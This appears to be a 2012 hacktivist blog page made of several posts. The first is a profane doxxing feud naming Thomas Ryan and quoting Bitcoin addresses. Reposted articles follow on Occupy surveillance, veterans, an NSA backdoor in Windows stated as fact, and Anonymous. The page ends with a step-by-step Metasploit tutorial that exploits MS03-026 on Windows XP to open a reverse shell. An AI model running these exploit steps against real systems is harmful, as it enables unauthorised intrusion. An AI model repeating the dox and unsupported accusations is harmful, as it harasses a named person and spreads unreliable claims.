While appearing to mock @cubespherical, while still somehow conveying him as a threat, you still manage to forget to *NOT* post his Bitcoin address. Our thoughts: You WANT @cubespherical to make some money off of some Bitcoin donations. You yourself use Bitcoin pretty regularly and accept it for donations on your blog. How do we know you aren’t just promoting @cubspherical’s Bitcoin address so that YOU can profit? Here are your words, directly lifted form your blog post:

“So here’s the throwdown. ‘Smeddles’ drop my dox. Do it. You have proved and shown nothing. Only that you are completely failing. You have no bitcoins donated, you have shown 2 things to me, Anonymous have too many chiefs and not enough indians, and that your numbers, at least 9000 allegedly, combined have 0.00000001 bitcoins between them. Here is what you have so far. lol.

https://blockexplorer.com/address/15JDgkwFVXvuxCt66eUQ434ty3jrvwPfGe

Either that or they were clever enough to realize you were full of it from the get go. As I have demonstrated and stated many times before, I will never ask the public for any money.”

WHY WOULD YOU EVEN NEED TO REMIND PEOPLE THAT YOU DON’T ASK FOR DONATIONS IF THIS ISN’T EVEN YOUR BITCOIN ADDRESS? Simple. Because it actually is.

It is also worth noting that both Smedley Manning and th3j35t3r favor Ubuntu 11.xx releases. They like using GNOME, too:
http://3.bp.blogspot.com/-9LpW_-t2lkU/TpmnnnPHn6I/AAAAAAAABMA/AKBOIZUm4sM/s1600/Opera-Next-Ubuntu-Oneric.png
http://4.bp.blogspot.com/_FJH0hYZmVtc/TF59PLnLUJI/AAAAAAAAJNE/IoVU8sTFyUo/s1600/Opera+Mobile+for+Linux+(1440×797)_023.png

To conclude this talk, Tom, we would like to take this privilege to give to you a formal FUCK YOU. You have been DOX’d and your master plan to avoid the inevitable by creating a new nemesis and a new DOX while asking fools to send you money for this bogus DOX has been foiled. You are over. No one cares about the small sites you take down with your shitty XerXes tool and everyone knows you didn’t actually DDoS WikiLeaks, or even have the ability to do so. You are a fame-whoring idiot that has finally been pulled so low, you serve no purpose for ever standing up again. Goodbye.

XOXO,
PiraX <3

@TheRealPiraX
http://pirax.de
Donate Bitcoin: 17gMaYgUsx7dj532s3ezXmfMrVhJ1BfRC1
We would also like to give a shout-out to our home on VoxAnon IRC. Much love to #voxanon _________________________________________________________________________

BUT THATS NOT IT – DON’T FORGET THIS LITTLE GEM…

Thomas Ryan: The Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

The Occupy Wall Street protests have been going on for a month. And it seems the FBI and NYPD have had help tracking protesters’ moves thanks to a conservative computer security expert who gained access to one of the group’s internal mailing lists,and then handed over information on the group’s plans to authorities and corporations targeted by protesters.

Since the Occupy Wall Street protest began on September 17, New York security consultant Thomas Ryan has been waging a campaign to infiltrate and discredit the movement. Ryan says he’s done contract work for the U.S. Army and he brags on his blog that he leads “a team called Black Cell, a team of the most-highly trained and capable physical, threat and cyber security professionals in the world.” But over the past few weeks, he and his computer security buddies have been spending time covertly attending Occupy Wall Street meetings, monitoring organizers’ social media accounts, and hanging out with protesters in Lower Manhattan.

As part of their intelligence-gathering operation, the group gained access to a listserv used by Occupy Wall Street organizers called September17discuss. On September17discuss, organizers hash out tactics and plan events, conduct post-mortems of media appearances, and trade the latest protest gossip. On Friday, Ryan leaked thousands of September17discuss emails to conservative blogger Andrew Breitbart, who is now using them to try to smear Occupy Wall Street as an anarchist conspiracy to disrupt global markets.

What may much more alarming to Occupy Wall Street organizers is that while Ryan was monitoring September17discuss, he was forwarding interesting email threads to contacts at the NYPD and FBI, including special agent Jordan T. Loyd, a member of the FBI’s New York-based cyber security team.

Oh, and what do real PATRIOT VETERANS think … ?

VETERAN: We didn’t “serve our country”; We serve the interests of Capital

“I’ve seen a ton on the facebooks about “thanking veterans for their service.” As a veteran let me just be very straightforward and honest with you. We didn’t “serve our country”; we don’t actually serve our brothers/sisters or our neighbors. We serve the interests of Capital. We never risked our lives or spent months on deployment away from our family and friends so they can have this abstract concept called “freedom”. We served big oil; big coal; Coca-Cola; Kellogg, Brown, and Root and all the other big Capital interests who don’t know a fucking thing about sacrifice. These people will never have to deal with the loss of a loved one or the physical and/or psychological scars that those who “serve”, and their families, have to deal with for the rest of their lives. The most patriotic thing someone can do is to tell truth to power and dedicate yourself to building power to overthrow these sociopathic assholes. I served with some of the most real and genuine people I’ve ever met. You’ll never see solidarity like the kind of solidarity you experience when your life depends on the person next to you. But most of us didn’t join for that; we joined because we were fucking poor and didn’t have many other options.” -Anonymous

IN CONCLUSION: An obvious desperate grab to stay relevant – Does anyone care?

ANSWER: jester who? Now back projects that create positive change in the world, instead of discussing individuals who support & enable the Military Industrial Complex of death, destruction, and global enslavement of Humanity.

OH AND FOR THOSE WHO FORGOT, A REMINDER:

How NSA access was built into Windows

Jun 6, 2012 | Globalist Corporations, Government Agenda

Careless mistake reveals subversion of Windows by NSA?

A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors). The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA “help information” trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled.

The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA.

(more…)

Is Anonymous The Internet’s Most Powerful Mirage?

May 28, 2012 | Anonymous, Leaks

You may have noticed it last week. Anonymous claimed the scalp of yet another a major government agency.

Supporters of the the online movement of activists and internet trolls said they’d stolen 1.7 GB of data from an agency within the Department of Justice that aggregates crime data. They claimed to have nabbed “lots of shiny things such as internal emails and the entire database dump.” They branded the heist as “Monday Mail Mayhem,” said it could help people “know the corruption in their government.” They posted it on Pirate Bay as a torrent, for anyone to see — and 1.7 GB was just the size of the zipped file.

Not many people bothered to check what was actually in the huge file.

Step in Identity Finder, a software security firm. Privacy officer Aaron Titus downloaded the payload last week and sifted through it all, checking out the veracity of the claims by Anonymous.

Turned out they were overhyped.

The zipped file contained 6.5 GB of web server files and “does not appear to contain any sensitive personal information, internal documents, or internal emails,” according to Titus. A folder named “Mail” was mostly empty, though it contained two administrative email addresses. There were also no personal details (social security numbers or credit card numbers), and the worst the breach had done was reveal the site’s web server file, which could be leveraged by other hackers for future attacks.

It looked like the breach had done more to grab attention from the media and the Department of Justice than do any real damage.

Surprised? You shouldn’t be. This was another illustration of the power of Anonymous as a continuing online insurgency: not in hacking per se, but its constant ability to grab eyeballs, project power, and give followers a voice and sense of purpose unlike any they’ve experienced before. What’s important for companies and policy makers (the typical targets) to note is that it’s oftentimes more a tease than anything else.

Other examples:

1) Earlier this month Fox News reported that an online group called TheWikiBoat, aligned with Anonymous, planned to bring down the websites of 46 major companies on Friday May 25. TheWikiBoat said in a public statement that it had “no motives other then [sic] doing it for the lulz,” (ie. for shits and giggles). The FBI’s Cyber Division was concerned enough to send an email to the likes of Apple Computer, McDonald’s and ExxonMobile warning them of a potential attack — which didn’t happen.

2) Around this time last year, a single supporter of Anonymous managed to grab global headlines when he tweeted that he had a cache of bank of America emails. What he eventually released was an e-mail exchange between himself and a BofA ex-staffer who made (what admittedly looked like valid) complaints about the bank’s management. But it did nothing to the bank’s stock price, and the news agenda quickly moved on.

3) In December 2010 Anonymous claimed responsibility for taking down the websites of PayPal, MasterCard and Visa after these firms nixed online donations to WikiLeaks. How? Supporters implied it was thanks to thousands of volunteers who had become part of an cyber army by downloading a software tool called LOIC. What really happened: a couple of supporters with botnets temporarily took the sites down — but the notion that Anonymous was an international “army” of hacktivists was left floating around the Internet.

Time and again, online supporters have laid claim to the brand power of Anonymous, invoking its name, imagery such as the Guy Fawkes logo and headless, suited man surrounded by olive leaves, along with the tag line, “We are Anonymous… Expect us.” The result: news outlets and policy makers sit up and listen, more so than they would if those supporters used their real names, or were literally anonymous. The power of Anonymous is propagated by the continued use of a name wrapped in hype and disinformation, more than the occasional real hacks.

The Anonymous “brand” gets street cred from cyber attacks carried out by a minority of hackers who know how to use SQL injection techniques or who know people who control botnets. The additional hype comes from the impassioned, sometimes-threatening rhetoric of less-skilled-but-enthusiastic followers on Twitter or the imageboard 4chan.

Why do these supporters join in? Everyone has their own reasons — something to do, the engaging community of people to talk to, the thrill of being part of a secret crowd. Sources in Anonymous that I have spoken to over the last year often speak to a sense of purpose they get from Anonymous, and sometimes the justification to do the subversive, often-illegal things online that they would not otherwise do. It’s mob mentality with a twist — the activist element of protest, twinned with the culture of trolling and exaggeration that runs through image boards like 4chan.

For law enforcement, who happen to chase anarchists with particular zeal in the United States, there isn’t so much a criminal organization to rope in as the mirage of one. No system with leaders and rules, but a culture and etiquette that is changing all the time. Many of the figureheads who organized the Anonymous attacks against Scientology in 2008 have left the community to focus on college or full-time jobs, many happy to break away from the frenetic pace of operations and the constant paranoia about getting doxxed. Those who’ve been arrested are upheld as martyrs within the network, and there are many more who are joining, and who think they can do a better job of hiding from the police.

Anonymous will continue to exist for some time, taking new followers, changing tactics, and often staying one spontaneously-placed step ahead of the police. They’ll fight for the right to their anonymity, to expose other people’s information, or anything they want, and they’ll come and go from the headlines. But these chaotic actors will stick around, and their greatest power will continue to be not their skills or abilities, but the very name that they can invoke.

For more details on how Anonymous works and the real, human stories behind it, check out my forthcoming book, “We Are Anonymous: Inside the Hacker World Of LulzSec, Anonymous and the Global Cyber Insurgency.”

Or follow me on Twitter: @parmy

SOURCE: http://www.forbes.com/sites/parmyolson/2012/05/30/is-anonymous-the-internets-most-powerful-mirage/

Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP

May 23, 2012 | Anonymous

In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now, we will begin to explore the Metasploit Framework and initiate a tried and true hack.

Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.

Exploit

Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.

Payload

A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.

Shellcode

This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.

Module

A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.

Listener

This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.

Show

Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.

Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1 Getting Started

First, open a terminal in Linux.

One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the the Metasploit console.

msfconsole

Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2 Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:

msf > search dcom

Step 3 Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.

msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4 Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.

msf > show options

Step 5 Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.

msf > set RHOST 10.0.0.3

Step 6 Show Payloads

Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:

msf > show payloads

Step 7 Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.

msf > set PAYLOAD generic/shell_reverse_tcp

Step 8 Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.

msf > set LHOST 10.0.0.6

Step 9 Exploit

Now we command Metasploit to exploit the system:

msf > exploit

Step 10 Open a Shell on the Hacked System

Type the command –I 1 to open a command shell on the XP system that will appear on your Metasploit console.

–I 1

To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!

C: >dir

Congratulations! You have just hacked your first system using Metasploit!

In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit’s proprietary payload.

Source: http://www.businessinsider.com/hack-like-a-pro-how-to-exploit-and-gain-remote-access-to-pcs-running-windows-xp-2012-4

« Older Entries